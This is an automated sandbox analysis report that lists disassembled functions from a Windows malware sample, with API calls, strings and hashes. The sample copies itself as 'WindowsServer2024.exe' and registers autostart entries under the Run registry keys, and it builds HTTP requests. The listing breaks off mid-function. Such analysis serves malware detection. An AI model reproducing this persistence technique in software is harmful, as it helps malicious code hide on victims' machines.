                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartup__snwprintf_memsetlstrlen
                                                                            • String ID: "%s%s"$UNLOAD.TXT$WindowsServer2024$WindowsServer2024$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 990009833-710896368
                                                                            • Opcode ID: 3d0a5fe2d659ec980ce5bae5c7cc009669e1cc7dbe8e348da454cc19c5d7b4d2
                                                                            • Instruction ID: d01cae921e73f6c6ca8953f8082a26c6cd9fbe4ecd1b66fc584a1fb4a63368db
                                                                            • Opcode Fuzzy Hash: 3d0a5fe2d659ec980ce5bae5c7cc009669e1cc7dbe8e348da454cc19c5d7b4d2
                                                                            • Instruction Fuzzy Hash: EA518371A40310EBEB209B60EC4FF643374B784B05F10845AF249BA3D1DAF86984CF19
                                                                            Function 007CFAD0 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 136memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB03
                                                                            • GetLastError.KERNEL32 ref: 007CFB0E
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CFB26
                                                                            • wsprintfW.USER32 ref: 007CFB4F
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007CFB7A
                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 007CFBD1
                                                                            • GetLastError.KERNEL32 ref: 007CFBDD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFC72
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFC7C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFC86
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CFCE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrlen$AllocCreateErrorFileLast$DirectoryFolderKnownModuleNamePathTask__snwprintfwsprintf
                                                                            • String ID: %s%s$P
                                                                            • API String ID: 4093884390-50959982
                                                                            • Opcode ID: fc7fa028ffe7065d9d27199a2b0094e1c485f46959025509c1aa33a46671581c
                                                                            • Instruction ID: 52938617f12546e2416988f6d72f5691bc94811ef854811c90860f988abfb574
                                                                            • Opcode Fuzzy Hash: fc7fa028ffe7065d9d27199a2b0094e1c485f46959025509c1aa33a46671581c
                                                                            • Instruction Fuzzy Hash: D7511075A01218EBDB20DBA4EC8CFAD7B75BB48311F1046ADE515A6290CB789E81CF64
                                                                            Function 007D3450 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 114memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C30,00000000,00000000,00000000), ref: 007D346D
                                                                            • _memset.LIBCMT ref: 007D3492
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D349E
                                                                            • __snwprintf.LIBCMT ref: 007D34D5
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 007D34E6
                                                                            • GetLastError.KERNEL32 ref: 007D3508
                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 007D3520
                                                                            • __snwprintf.LIBCMT ref: 007D3551
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D3560
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007D3575
                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 007D3591
                                                                            • _memmove.LIBCMT ref: 007D35C2
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 007D35CE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D35DB
                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 007D35F0
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D35FD
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 007D360A
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 007D3614
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DirectoryFreeLocal$AllocCreateRemoveTask__snwprintflstrlen$ErrorFolderKnownLastPath_memmove_memset
                                                                            • String ID: %s\System32$\\?\%s
                                                                            • API String ID: 2912166009-2868705786
                                                                            • Opcode ID: e77920dd3f64552bc779a5fed2b83c62ea8b42fe7822c4092d032df5f5383292
                                                                            • Instruction ID: d8f4831e46686286e6009426e5040cb27d785849949ac64a06a90c7b087cb0a4
                                                                            • Opcode Fuzzy Hash: e77920dd3f64552bc779a5fed2b83c62ea8b42fe7822c4092d032df5f5383292
                                                                            • Instruction Fuzzy Hash: 60415EB598021CEBDB20DBA0DC8DBE9B774BB98700F1049D5F509A6280D7789F80CF61
                                                                            Function 007D9D60 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: <$HEAD$NTDLL.DLL$RtlTimeToSecondsSince1970
                                                                            • API String ID: 0-2197813208
                                                                            • Opcode ID: 050ca7a467cb8bf8f53547253d6a13cfa8e1dc6aaf02927f2630e82f70dfbe3b
                                                                            • Instruction ID: 46e559fb2bd4e281af64b44774ab4ef88687a17212a9dd94150ea6bc237c7ae4
                                                                            • Opcode Fuzzy Hash: 050ca7a467cb8bf8f53547253d6a13cfa8e1dc6aaf02927f2630e82f70dfbe3b
                                                                            • Instruction Fuzzy Hash: 3BC1FCB1A00318EFDB14DFA4DC49BAEBBB5BF88704F108559E609AB380D7799984CF51
                                                                            Function 007CB6D0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 116memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CB701
                                                                            • GetLastError.KERNEL32 ref: 007CB70C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CB724
                                                                            • __snwprintf.LIBCMT ref: 007CB74E
                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007CB773
                                                                            • GetLastError.KERNEL32 ref: 007CB77C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB7FC
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB806
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB851
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrlen$AllocCreateErrorLast__snwprintf$DirectoryFileFolderKnownPathTask
                                                                            • String ID: %s%s$P$WindowsServer2024.exe
                                                                            • API String ID: 3676116642-1786351275
                                                                            • Opcode ID: 7351a5dd1b1db2c9915230ed88f648611015470910b59da09ba13bd030603135
                                                                            • Instruction ID: 486e8876c4a28b009c4dd923362c4886f1852ed505e4ab5097e7acfcf136c321
                                                                            • Opcode Fuzzy Hash: 7351a5dd1b1db2c9915230ed88f648611015470910b59da09ba13bd030603135
                                                                            • Instruction Fuzzy Hash: 7141C875D00209EBDF14DBA4DC4AFAEBBB9BB88711F10452DF611B6290D7789940CFA1
                                                                            Function 007D9150 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 390COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: <$GET
                                                                            • API String ID: 0-427699995
                                                                            • Opcode ID: b4abaf26325ecbffe0a12b209d60a04f808773f653794d1b4064e6e9a026222b
                                                                            • Instruction ID: 6b7f260050ffeb11278019448c8991ddfdc682d517d804b4e7bbd44298630da8
                                                                            • Opcode Fuzzy Hash: b4abaf26325ecbffe0a12b209d60a04f808773f653794d1b4064e6e9a026222b
                                                                            • Instruction Fuzzy Hash: 93021AB0900318DFDB24DFA4DD49BEDB7B5BB48700F104699E609AB380D7B8AA84CF55
                                                                            Function 007D9750 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 369COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: <$GET
                                                                            • API String ID: 0-427699995
                                                                            • Opcode ID: 4f552d57753fd1b4d955e907243bce8157ea4a57aa72d086ba39ce8ef5116833
                                                                            • Instruction ID: 1dc88dfb50a8ba0c2d0c5449dd1f8ffee7aa185227034f23a4976ddfd9f6995a
                                                                            • Opcode Fuzzy Hash: 4f552d57753fd1b4d955e907243bce8157ea4a57aa72d086ba39ce8ef5116833
                                                                            • Instruction Fuzzy Hash: EDF100B0A10218DFDB54DFA4DD49BADBBB5FF48704F108559E609AB380DB789984CF50
                                                                            Function 007CBA30 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 92memoryfilesynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007CBA41
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007CBA5F
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBA74
                                                                            • __snwprintf.LIBCMT ref: 007CBA9E
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007CBAC0
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007CBAEF
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBB00
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007CBB0A
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CBB1C
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CBB2F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CBB39
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007CBB4B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBB55
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007CBB5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait__snwprintf
                                                                            • String ID: %s\%s$UNLOAD.TXT${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 1432346771-2750632160
                                                                            • Opcode ID: 3a464ffac06642564380e2b8629775f7c72ad67f18cef3670f88c0e80c5ecec6
                                                                            • Instruction ID: 375a28d0483bd1ca499e7a88a7549f4c965a35b50c99d639df2066aab661b8d2
                                                                            • Opcode Fuzzy Hash: 3a464ffac06642564380e2b8629775f7c72ad67f18cef3670f88c0e80c5ecec6
                                                                            • Instruction Fuzzy Hash: 89310DB5A40304EBDB249FA4DC4EFADBB75FB88711F108A5CF621A62D4D7789A40CB50
                                                                            Function 007D2560 Relevance: 29.8, APIs: 10, Strings: 7, Instructions: 84registrymemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D258B
                                                                            • wnsprintfW.SHLWAPI ref: 007D25BA
                                                                            • RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D25DD
                                                                            • RegSetValueExW.ADVAPI32(?,00836FC8,00000000,00000001,?,?), ref: 007D2600
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,007D6AED), ref: 007D260A
                                                                            • RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D2627
                                                                            • RegSetValueExW.ADVAPI32(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},00000000,00000001,?,?), ref: 007D264A
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,007D6AED), ref: 007D2654
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,007D6AED), ref: 007D265E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2668
                                                                            Strings
                                                                            • j}, xrefs: 007D2566, 007D2569
                                                                            • %s%s %s, xrefs: 007D25AC
                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 007D2641
                                                                            • {741330C7-73F4-49B6-9258-6679317DED46}, xrefs: 007D259E
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 007D25D3
                                                                            • WindowsServer2024.exe, xrefs: 007D25A3
                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 007D261D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Freelstrlen$AllocCloseOpenValue$FolderKnownPathTask__snwprintfwnsprintf
                                                                            • String ID: %s%s %s$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}${AB1F3E47-AEF1-400E-A108-233A046C3A34}$j}
                                                                            • API String ID: 3858463887-980750824
                                                                            • Opcode ID: f5fea622eadbd380a22912794c85d39f138f85225c44b84d48d1785fb48b4da4
                                                                            • Instruction ID: 5489a909f4a7179cc04172ab98dd452e081887d93fae27c0edb2dce850b02c47
                                                                            • Opcode Fuzzy Hash: f5fea622eadbd380a22912794c85d39f138f85225c44b84d48d1785fb48b4da4
                                                                            • Instruction Fuzzy Hash: 5C31A075A00309FFDB14DBA0DC89FBE7779FB88B05F004858F615A6291D6B9A942CB60
                                                                            Function 007D2710 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 117memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007D271C
                                                                            • _memmove.LIBCMT ref: 007D273B
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D2788
                                                                            • GetTempPathW.KERNEL32(00007FFF,00000000), ref: 007D27A4
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D27B9
                                                                            • __snwprintf.LIBCMT ref: 007D27E2
                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000002,00000000,00000000), ref: 007D27FD
                                                                            • WriteFile.KERNEL32(000000FF,00000000,00000000,?,00000000), ref: 007D281E
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007D2830
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D283A
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007D2849
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007D2853
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D285D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2867
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2871
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AllocFile$CloseHandle$CreateDeletePathTempWrite__snwprintf_memmove
                                                                            • String ID: %s%s
                                                                            • API String ID: 2323091063-3252725368
                                                                            • Opcode ID: 366da5ce2ff743708e052b3b7d56f403aadcccf5afd8c902e781c8181d731202
                                                                            • Instruction ID: bbbcf31b8958c6f5ddbaf96a082310a966427baf7ed85d5cac4419ea3e06e7e7
                                                                            • Opcode Fuzzy Hash: 366da5ce2ff743708e052b3b7d56f403aadcccf5afd8c902e781c8181d731202
                                                                            • Instruction Fuzzy Hash: D7412B75A00209EBDB14DFA4DC89FBEBBB5BF88700F104959F615A7391CB789A42CB50
                                                                            Function 007C8A80 Relevance: 25.7, APIs: 17, Instructions: 169stringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007D0010: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D6B10,00831178,007D6B10), ref: 007D0023
                                                                              • Part of subcall function 007D0010: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D0034
                                                                              • Part of subcall function 007D0010: wnsprintfW.SHLWAPI ref: 007D005F
